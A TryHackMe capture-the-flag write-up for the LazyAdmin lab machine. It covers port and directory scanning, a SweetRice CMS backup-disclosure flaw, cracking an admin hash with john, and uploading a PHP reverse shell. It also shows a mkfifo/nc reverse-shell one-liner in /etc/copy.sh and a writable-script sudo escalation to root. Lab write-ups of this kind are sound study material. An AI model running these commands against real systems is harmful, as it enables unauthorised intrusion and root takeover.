LazyAdmin — TryHackMe Writeup

Published in

InfoSec Write-ups

4 min readJan 27, 2025

Target IP: 10.10.204.37
In this write-up, we’ll go through the steps to exploit the LazyAdmin machine from TryHackMe. This includes scanning, enumeration, exploitation, and privilege escalation, leading to the capture of both user and root flags.

Let’s get started! 🚀

0. Scanning

We begin by scanning the target machine for open ports using nmap:

❯ nmap -sV -Pn 10.10.204.37 -v
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-11 16:46 +0545
........
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The server is running Linux with SSH and Apache web services exposed.

1. Enumeration

Exploring Port 80

Navigating to http://10.10.204.37/, we find the default Apache page. Using gobuster for directory enumeration reveals a hidden /content directory.

❯ gobuster dir -u http://10.10.204.37/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.204.37/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/content              (Status: 301) [Size: 314] [--> http://10.10.204.37/content/]
.....

Visiting /content reveals the SweetRice CMS.

CMS Exploit

Searching for known vulnerabilities in SweetRice (version 1.5.1), we find a backup disclosure exploit:

Title: SweetRice 1.5.1 - Backup Disclosure
Application: SweetRice
Versions Affected: 1.5.1
Vendor URL: http://www.basic-cms.org/
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
Discovered by: Ashiyane Digital Security Team
Tested on: Windows 10
Bugs: Backup Disclosure
Date: 16-Sept-2016


Proof of Concept :

You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup

and can access to website files backup from:
http://localhost/SweetRice-transfer.zip

Accessing mysql_backup dir, there is mysql backup. On the 79 th line of the file, we have what we needed for now, there is admin name and its password in hash format.

Using john to crack the hash reveals the password: Passw******

john --format=raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt password.hash

username: ma*****
password hash: 42f749ade7f9e195bf475f**********
password: Passw******

2. Exploitation

Like `inc` dir we can have others too, so finding dir in `/content`, we have `as` dir. This is the admin login page.

We looged in into the admin panel and found

I’m using media center to upload the reverse shell exploit, provided by pentestmonkey. I changed IP address and uploaded there. Maybe need to change the extension, made phtml and the file uploaded there.

3. Gaining Access

Now setup netcat listening on port `1234` in my host machine, and executing the exploit we will get the connection.

❯ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.204.37 37452
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 14:57:51 up 57 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

We got the user flag as

$ ls /home
itguy
$ ls /home/itguy
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat /home/itguy/user.txt
THM{63e5bce9271952aad1**************}

4. Privilege Escalation

Using sudo -l, we discover that the www-data user can execute a specific Perl script (/home/itguy/backup.pl) with root privileges.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Examining the backup.pl script, it calls /etc/copy.sh and this file is writable.

$ cat /home/itguy/backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
$ ls -l /etc/copy.sh

-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh

Now need to change IP to my attacker IP, so that it can connect to attacker machine with user root.

Alternatively, this spawn the root shell and got the root flag.

$ echo "/bin/bash" > /etc/copy.sh
$ sudo /usr/bin/perl /home/itguy/backup.pl
whoami
root
cat /root/root.txt
THM{6637f41d0177b6f37cb20d**********}

This machine highlights the importance of securing:

Web directories (e.g., /inc/mysql_backup).
Permissions on scripts and files.

Need to secure from the designing.

Happy Hacking!